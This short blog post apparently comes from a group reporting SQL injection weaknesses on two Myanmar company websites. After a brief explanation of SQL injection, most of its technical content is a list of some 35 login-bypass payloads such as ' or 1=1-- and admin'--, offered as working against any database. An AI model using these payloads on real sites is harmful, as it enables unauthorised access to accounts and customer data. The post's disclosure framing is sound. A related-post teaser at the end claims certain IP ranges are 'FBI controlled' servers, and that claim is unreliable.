Last week PlanetCreator informed Security Weakness of Myanmar Uready http://www.myanmaruready.com/ and Su Aung Phyo Co., Ltd. http://www.suaungphyo.com to their webmaster and fixed as long as we reported.

SQL injection is a technique used to take advantage of non- validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user provided parameters, and can therefore embed SQL commands inside these parameters. the result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.

A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.

Data types:
mysql.user
mysql.host
mysql.db

Bypassing login scripts:
SQL injection strings and the DB doesnt matter.
‘) OR (’a’ = ‘a
‘) OR (’1?-’1
‘or”=’
‘ OR ‘1=1
admin’–
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 *
” or 0=0 *
or 0=0 *
‘ or ‘x’=’x
” or “x”=”x
‘) or (’x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (’a’=’a
“) or (”a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (’a’=’a
hi”) or (”a”=”a
‘ or 1=1–
or a=a–
‘ or 1=1–
1? having ‘1?=’1?–
‘ or ‘x’=’x–
foo’+OR+’1?=’1

Remark: I really appreciate their action when i report them bcoz they care not only their web’s security also customers.

Explore More

Dangerous IP’s – Do not scan

All the below are FBI controlled Linux servers & IPs/IP-Ranges 207.60.0.0 – 207.60.255.0 The Internet Access Company207.60.2.128 – 207.60.2.255 Abacus Technology207.60.3.0 – 207.60.3.127 Mass Electric Construction Co.207.60.3.128 – 207.60.3.255 Peabody

Hacking with Google, Is it Possible

Hacking with Google, Is it Possible Every hacker needs to develop his abilities if he wants to maintain up to date. That’s why he will use every tool he can

New phishing scam targets high level executives

A new phishing attack has been circulating lately, but instead of trying to dupe millions of computer users into giving up their financial information, this one is aimed at high